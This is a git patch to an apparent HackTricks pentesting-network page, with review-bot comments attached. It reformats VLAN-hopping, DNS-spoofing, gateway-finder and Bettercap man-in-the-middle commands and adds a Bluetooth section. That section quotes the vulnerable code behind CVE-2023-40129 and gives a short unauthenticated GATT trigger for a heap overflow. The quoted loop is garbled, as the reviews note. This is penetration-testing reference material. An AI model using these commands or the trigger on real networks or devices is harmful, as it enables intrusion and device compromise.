From 3dd22c7e8c1020ebaa0e84f53a93621d14cd3ed1 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Mon, 27 Oct 2025 18:38:23 +0000 Subject: [PATCH] Add content from: Paint it blue: Attacking the bluetooth stack --- .../pentesting-network/README.md | 96 ++++++++++++++++++- 1 file changed, 92 insertions(+), 4 deletions(-) diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md index cf9367f951f..a128c17e554 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/README.md +++ b/src/generic-methodologies-and-resources/pentesting-network/README.md @@ -333,7 +333,10 @@ By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\ If DHCP is not available, then use _ifconfig_ to set a static IP address. -``` +
+VLAN interface configuration (example) + +```bash root@kali:~# modprobe 8021q root@kali:~# vconfig add eth1 250 Added VLAN with VID == 250 to IF -:eth1:- @@ -352,6 +355,9 @@ eth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65 root@kali:~# arp-scan -I eth1.250 10.121.5.0/24 ``` +
+ + ```bash # Another configuration example modprobe 8021q @@ -691,15 +697,22 @@ set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on **Configure own DNS with dnsmasq** ```bash -apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon +apt-get install dnsmasq +echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf +echo "127.0.0.1 domain.example.com" > dnsmasq.hosts +sudo dnsmasq -C dnsmasq.conf --no-daemon dig @localhost domain.example.com # Test the configured DNS ``` + ### Local Gateways Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding. -``` +
+gateway-finder usage example + +```bash root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git root@kali:~# cd gateway-finder/ root@kali:~# arp-scan -l | tee hosts.txt @@ -717,6 +730,9 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder [+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100] ``` +
+ + ### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) For local host resolution when DNS lookups are unsuccessful, Microsoft systems rely on **Link-Local Multicast Name Resolution (LLMNR)** and the **NetBIOS Name Service (NBT-NS)**. Similarly, **Apple Bonjour** and **Linux zero-configuration** implementations utilize **Multicast DNS (mDNS)** for discovering systems within a network. Due to the unauthenticated nature of these protocols and their operation over UDP, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services. 
@@ -796,7 +812,7 @@ Note that in order to perform this attack the victim has to try to access initia More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly). -**sslStrip or sslStrip+ doesn;t work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.** +**sslStrip or sslStrip+ doesn't work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.** TODO: easy-creds, evilgrade, metasploit, factory @@ -840,6 +856,9 @@ Other things to test is to try to sign the certificate with a valid certificate ## Bettercap +
+Common Bettercap commands + ```bash # Events events.stream off #Stop showing events @@ -866,6 +885,9 @@ set wifi.ap.encryption false #If true, WPA2 wifi.recon on; wifi.ap ``` +
+ + ### Active Discovery Notes Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent. @@ -897,6 +919,70 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19 Bettercap broadcast WSD packets searching for services (UDP Port 3702). +## Bluetooth (L2CAP/ATT/GATT) Attacks + +- Android Fluoride exposes services over L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Services register via: + +```c +uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info, + bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info, + uint16_t my_mtu, uint16_t required_remote_mtu, + uint16_t sec_level); +``` + +- BlueBlue framework enables Scapy-based L2CAP/ATT crafting (built on BlueBorne l2cap_infra). Example: + +```python +acl = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks') +gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672) +gatt.send_frag(p8(GATT_READ)+p16(1234)) +print(gatt.recv()) +``` + +- CVE-2023-40129 (Fluoride GATT): integer underflow in Read Multiple Variable response builder can cause ~64KB heap overflow when MTU truncates a variable-length element but the +2 length field is not accounted for. + +
+Root cause (GATT Read Multiple Variable) + +```c +static void build_read_multi_rsp(tGATT_SR_CMD* p_cmd, uint16_t mtu) { + uint16_t ii, total_len, len; uint8_t* p; bool is_overflow=false; + len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu; + BT_HDR* p_buf = (BT_HDR*)osi_calloc(len); p_buf->offset=L2CAP_MIN_OFFSET; + p = (uint8_t*)(p_buf + 1) + p_buf->offset; *p++ = GATT_RSP_READ_MULTI_VAR; + p_buf->len=1; + for (ii=0; iimulti_req.num_handles; ii++) { + tGATTS_RSP* p_rsp = ...; // dequeued + if (p_rsp) { + total_len = (p_buf->len + p_rsp->attr_value.len); + if (p_cmd->multi_req.variable_len) total_len += 2; + if (total_len > mtu) { + len = p_rsp->attr_value.len - (total_len - mtu); // BUG: ignores +2 + is_overflow = true; + } else { len = p_rsp->attr_value.len; } + if (p_cmd->multi_req.variable_len) { UINT16_TO_STREAM(p, len); p_buf->len += 2; } + memcpy(p, p_rsp->attr_value.value, len); // heap overflow + if (!is_overflow) p += len; p_buf->len += len; if (is_overflow) break; + } + } +} +``` + +- On variable-length entries, the overflow path subtracts only (total_len - mtu), ignoring the +2 length field, so len underflows (e.g., 0xFFFE) and memcpy writes ~64KB past the end of the buffer. +
+ +- Minimal unauthenticated trigger (small MTU forces underflow on the 4th attribute): + +```python +# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55 +acl = ACLConnection(interface, bdaddr) +gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55) +pkt = b'\x20' # opcode +pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9) +gatt.send(pkt) +# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite +``` + ### Telecom / Mobile-Core (GTP) Exploitation @@ -910,6 +996,8 @@ telecom-network-exploitation.md - **Network Security Assessment: Know Your Network (3rd edition)** - **Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood** - [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) +- [Paint it blue: Attacking the bluetooth stack (Synacktiv)](https://www.synacktiv.com/en/publications/paint-it-blue-attacking-the-bluetooth-stack) +- [BlueBorne L2CAP testing infra (l2cap_infra)](https://github.com/ArmisSecurity/blueborne/tree/master/l2cap_infra)
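Review bot: the four `+` lines in the `@@ -333,7 +333,10 @@` hunk that wrap the VLAN example render here as a bare `+` followed by the bare title `VLAN interface configuration (example)`, so the collapsible markup they are supposed to carry is not visible in this view; confirm the opening element is actually present and that it is paired with the closer added by the `@@ -352,6 +355,9 @@` hunk, which adds three `+` lines where one closer plus one blank line would do (drop the extra blank `+` line so a single blank line separates the two code blocks). Changing the opening fence from a bare ``` to ```bash is a good fix because the block mixes shell prompts with `ifconfig` output; the same treatment is applied to the gateway-finder block in the `@@ -691,15 +697,22 @@` hunk, so the patch is consistent on that point.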
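Review bot: the dnsmasq rewrite in the `@@ -691,15 +697,22 @@` hunk correctly splits the run-together `-` one-liner into four commands, but it silently drops the two comments that line carried (`#Create dnsmasq.conf` and the note that the domains listed in `dnsmasq.hosts` are the ones dnsmasq will resolve); keep at least the second one next to `echo "127.0.0.1 domain.example.com" > dnsmasq.hosts`, since it is what tells the reader where the spoofed records go. Also, `apt-get install dnsmasq` is run unprivileged while `sudo dnsmasq -C dnsmasq.conf --no-daemon` uses `sudo`; use `sudo` on both lines or on neither.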
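Review bot: the `@@ -796,7 +812,7 @@` hunk only corrects `doesn;t`; since the whole line is being rewritten anyway, also fix the two errors that survive on the `+` line, `wwww.facebook.com` (four `w`s, the host is `www.facebook.com`) and `the first time that a user access` (should be `accesses`), so the line does not need a third touch.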
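Review bot: the `for` loop in the `build_read_multi_rsp` listing of the `@@ -897,6 +919,70 @@` hunk reads `for (ii=0; iimulti_req.num_handles; ii++)`, which does not compile; the condition is `ii < p_cmd->multi_req.num_handles` (the `< p_cmd->` was swallowed, most likely by an HTML-escape pass on the `<`), and it must be restored before this is committed as the quoted root cause of CVE-2023-40129. Three further points in the same hunk. (1) The new `## Bluetooth (L2CAP/ATT/GATT) Attacks` H2 is inserted directly above the existing `### Telecom / Mobile-Core (GTP) Exploitation` H3, which reparents the telecom section under Bluetooth; make the Bluetooth heading `###` like its neighbours or move it after the telecom section. (2) The two BlueBlue snippets disagree on the API: the first uses `ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')` and `gatt.send_frag(...)`, the trigger uses `ACLConnection(interface, bdaddr)` and `gatt.send(pkt)`; pick the constructor and send method the framework actually exposes and use them in both, and say where `p8`, `p16`, `PSM_ATT` and `GATT_READ` are imported from. (3) The arithmetic in the trigger comment (`p_buf->len=55 (1 + 3*(16+2))`, `len=16-(73-55)=-2`) holds only if the attribute at handle 9 carries a 16-byte value and the negotiated ATT MTU is really 55; state both assumptions next to the snippet, and note that because `len` is `uint16_t` the `-2` becomes `0xFFFE`, which is where the `~64KB overwrite` figure comes from.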